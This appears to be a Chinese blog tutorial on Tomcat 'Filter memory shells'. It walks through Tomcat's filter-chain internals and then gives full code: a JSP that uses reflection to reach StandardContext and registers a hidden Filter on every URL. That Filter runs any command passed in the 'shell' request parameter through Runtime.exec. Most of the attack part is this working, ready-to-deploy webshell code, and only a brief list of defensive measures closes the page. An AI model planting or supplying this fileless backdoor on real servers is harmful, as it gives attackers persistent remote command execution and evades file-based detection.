Filter内存马技术分析与实现<\/h1>

一、Tomcat三大组件概述<\/h2>

在Tomcat容器中，HTTP请求处理涉及三大核心组件：<\/p>

Servlet<\/strong>：处理客户端请求并生成响应，执行核心业务逻辑<\/li>

Filter<\/strong>：过滤器，在HttpServletRequest到达Servlet及HttpServletResponse到达客户端前进行拦截

主要功能：权限控制、日志记录、性能监控、数据加解密<\/li> <\/ul> <\/li>
Listener<\/strong>：监听应用程序中的特定事件并执行相应操作

主要功能：管理应用程序生命周期、会话状态、资源初始化和释放<\/li> <\/ul> <\/li> <\/ol>
二、Tomcat请求处理流程<\/h2>

启动阶段<\/strong>：<\/p>

ServletContextListener执行contextInitialized方法<\/li>
初始化资源（如数据库连接池）<\/li> <\/ul> <\/li>

请求到达阶段<\/strong>：<\/p>

请求到达Tomcat后传递给匹配路径的过滤器链<\/li> <\/ul> <\/li>

Filter链处理<\/strong>：<\/p>

请求依次经过web.xml或注解定义的过滤器链<\/li>
每个Filter的doFilter方法依次执行<\/li>
Filter可修改请求对象或拦截请求<\/li> <\/ul> <\/li>

Servlet处理<\/strong>：<\/p>

请求到达目标Servlet<\/li>
Servlet调用相应doGet\/doPost方法处理请求<\/li> <\/ul> <\/li>

响应处理<\/strong>：<\/p>

响应依次经过Filter链<\/li>
Filter可修改响应内容<\/li>
响应最终传递回客户端<\/li> <\/ul> <\/li>

销毁阶段<\/strong>：<\/p>

ServletContextListener执行contextDestroyed方法<\/li>
释放资源<\/li> <\/ul> <\/li> <\/ol>
三、Filter内存马实现原理<\/h2>
1. Filter执行流程分析<\/h3>

ApplicationFilterChain<\/code>类的filters<\/code>属性包含自定义filter信息<\/li>
StandardWrapperValve<\/code>类创建Filter链并准备执行doFilter<\/li>
FilterChain<\/code>接口用于封装和管理过滤器链<\/li> <\/ul> 2. FilterChain创建过程<\/h3> ApplicationFilterFactory.createFilterChain()<\/code>方法关键步骤：<\/p> 实例化ApplicationFilterChain<\/code><\/li> 获取当前Servlet所属的StandardContext<\/code>对象<\/li> 获取上下文中的所有FilterMap<\/code><\/li> 根据URL和Servlet名称匹配过滤器<\/li> 使用addFilter<\/code>方法将filterConfig<\/code>加入链中<\/li> 返回创建好的filterChain<\/code><\/li> <\/ol> 四、内存马构造步骤<\/h2> 1. 获取Context对象<\/h3> \/\/ 获取ServletContext对象 <\/span><\/span><\/span><\/span>ServletContext servletContext =<\/span> request.<\/span>getServletContext<\/span>();<\/span> <\/span><\/span> <\/span><\/span>\/\/ 获取ApplicationContextFacade对象 <\/span><\/span><\/span><\/span>ApplicationContextFacade applicationContextFacade =<\/span> (<\/span>ApplicationContextFacade)<\/span> servletContext;<\/span> <\/span><\/span> <\/span><\/span>\/\/ 通过反射获取ApplicationContext <\/span><\/span><\/span><\/span>Field applicationContextFacadeContext =<\/span> applicationContextFacade.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span> <\/span><\/span>applicationContextFacadeContext.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>ApplicationContext applicationContext =<\/span> (<\/span>ApplicationContext)<\/span> applicationContextFacadeContext.<\/span>get<\/span>(<\/span>applicationContextFacade);<\/span> <\/span><\/span> <\/span><\/span>\/\/ 获取StandardContext <\/span><\/span><\/span><\/span>Field applicationContextContext =<\/span> applicationContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span> <\/span><\/span>applicationContextContext.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span> applicationContextContext.<\/span>get<\/span>(<\/span>applicationContext);<\/span> <\/span><\/span><\/code><\/pre>2. 获取filterConfigs<\/h3> Field filterConfigs =<\/span> standardContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"filterConfigs"<\/span>);<\/span> <\/span><\/span>filterConfigs.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>HashMap hashMap =<\/span> (<\/span>HashMap)<\/span> filterConfigs.<\/span>get<\/span>(<\/span>standardContext);<\/span> <\/span><\/span><\/code><\/pre>3. 构造恶意Filter<\/h3> Filter filter =<\/span> new<\/span> Filter()<\/span> {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> init<\/span>(<\/span>FilterConfig filterConfig)<\/span> throws<\/span> ServletException {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"filter初始化"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest servletRequest,<\/span> ServletResponse servletResponse,<\/span> FilterChain filterChain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span> <\/span><\/span> servletRequest.<\/span>setCharacterEncoding<\/span>(<\/span>"utf-8"<\/span>);<\/span> <\/span><\/span> servletResponse.<\/span>setCharacterEncoding<\/span>(<\/span>"utf-8"<\/span>);<\/span> <\/span><\/span> servletResponse.<\/span>setContentType<\/span>(<\/span>"text\/html;charset=UTF-8"<\/span>);<\/span> <\/span><\/span> filterChain.<\/span>doFilter<\/span>(<\/span>servletRequest,<\/span>servletResponse);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>servletRequest.<\/span>getParameter<\/span>(<\/span>"shell"<\/span>));<\/span> <\/span><\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>servletRequest.<\/span>getParameter<\/span>(<\/span>"shell"<\/span>));<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"执行过滤"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> destroy<\/span>()<\/span> {}<\/span> <\/span><\/span>};<\/span> <\/span><\/span><\/code><\/pre>4. 构造FilterDef并添加到StandardContext<\/h3> FilterDef filterDef =<\/span> new<\/span> FilterDef();<\/span> <\/span><\/span>filterDef.<\/span>setFilter<\/span>(<\/span>filter);<\/span> <\/span><\/span>filterDef.<\/span>setFilterName<\/span>(<\/span>filterName);<\/span> <\/span><\/span>filterDef.<\/span>setFilterClass<\/span>(<\/span>filter.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span> <\/span><\/span>standardContext.<\/span>addFilterDef<\/span>(<\/span>filterDef);<\/span> <\/span><\/span><\/code><\/pre>5. 构造FilterMap并添加到StandardContext<\/h3> FilterMap filterMap =<\/span> new<\/span> FilterMap();<\/span> <\/span><\/span>filterMap.<\/span>addURLPattern<\/span>(<\/span>"\/*"<\/span>);<\/span> \/\/ 匹配所有请求 <\/span><\/span><\/span><\/span>filterMap.<\/span>setFilterName<\/span>(<\/span>filterName);<\/span> <\/span><\/span>filterMap.<\/span>setDispatcher<\/span>(<\/span>DispatcherType.<\/span>REQUEST<\/span>.<\/span>name<\/span>());<\/span> <\/span><\/span>standardContext.<\/span>addFilterMapBefore<\/span>(<\/span>filterMap);<\/span> <\/span><\/span><\/code><\/pre>6. 构造ApplicationFilterConfig并添加到filterConfigs<\/h3> Constructor constructor =<\/span> ApplicationFilterConfig.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>(<\/span>Context.<\/span>class<\/span>,<\/span> FilterDef.<\/span>class<\/span>);<\/span> <\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>ApplicationFilterConfig applicationFilterConfig =<\/span> (<\/span>ApplicationFilterConfig)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>standardContext,<\/span> filterDef);<\/span> <\/span><\/span>hashMap.<\/span>put<\/span>(<\/span>filterName,<\/span> applicationFilterConfig);<\/span> <\/span><\/span><\/code><\/pre>五、完整内存马实现代码<\/h2> <%@ page import="java.lang.reflect.Field" %> <%@ page import="org.apache.catalina.Context" %> <%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %> <%@ page import="java.lang.reflect.Constructor" %> <%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %> <%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %> <%@ page import="org.apache.catalina.core.ApplicationContextFacade" %> <%@ page import="org.apache.catalina.core.ApplicationContext" %> <%@ page import="org.apache.catalina.core.StandardContext" %> <%@ page import="java.util.HashMap" %> <%@ page import="java.io.IOException" %> <% \/\/ 获取ServletContext对象 ServletContext servletContext = request.getServletContext(); ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext; \/\/ 通过反射获取ApplicationContext Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context"); applicationContextFacadeContext.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade); \/\/ 获取StandardContext Field applicationContextContext = applicationContext.getClass().getDeclaredField("context"); applicationContextContext.setAccessible(true); StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext); \/\/ 获取filterConfigs Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs"); filterConfigs.setAccessible(true); HashMap hashMap = (HashMap) filterConfigs.get(standardContext); String filterName = "Filter"; if (hashMap.get(filterName)==null){ \/\/ 构造filter对象 Filter filter = new Filter() { @Override public void init(FilterConfig filterConfig) throws ServletException { System.out.println("filter初始化"); } @Override public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { servletRequest.setCharacterEncoding("utf-8"); servletResponse.setCharacterEncoding("utf-8"); servletResponse.setContentType("text\/html;charset=UTF-8"); filterChain.doFilter(servletRequest,servletResponse); System.out.println(servletRequest.getParameter("shell")); Runtime.getRuntime().exec(servletRequest.getParameter("shell")); System.out.println("执行过滤"); } @Override public void destroy() {} }; \/\/ 构造filterDef对象 FilterDef filterDef = new FilterDef(); filterDef.setFilter(filter); filterDef.setFilterName(filterName); filterDef.setFilterClass(filter.getClass().getName()); standardContext.addFilterDef(filterDef); \/\/ 构造filterMap对象 FilterMap filterMap = new FilterMap(); filterMap.addURLPattern("\/*"); filterMap.setFilterName(filterName); filterMap.setDispatcher(DispatcherType.REQUEST.name()); standardContext.addFilterMapBefore(filterMap); \/\/ 构造filterConfig Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class); constructor.setAccessible(true); ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef); \/\/ 将filterConfig添加到filterConfigs中 hashMap.put(filterName,applicationFilterConfig); response.getWriter().println("注入完成"); } %> <\/code><\/pre> 六、防御措施<\/h2> 代码审计<\/strong>：定期检查web应用中的JSP文件<\/li> 权限控制<\/strong>：限制上传和执行动态脚本的能力<\/li> 运行时监控<\/strong>：监控可疑的Filter动态注册行为<\/li> 安全加固<\/strong>：禁用不必要的反射功能<\/li> 更新补丁<\/strong>：及时更新Tomcat和相关组件<\/li> <\/ol> 七、总结<\/h2> Filter内存马通过动态注册恶意Filter到Tomcat容器中，利用Filter的请求拦截能力实现命令执行。其核心在于：<\/p> 通过反射获取StandardContext对象<\/li> 构造恶意Filter及其相关配置对象<\/li> 将恶意Filter添加到Filter链中<\/li> 通过URL参数传递执行命令<\/li> <\/ol> 理解其实现原理有助于更好地防御此类内存马攻击。<\/p>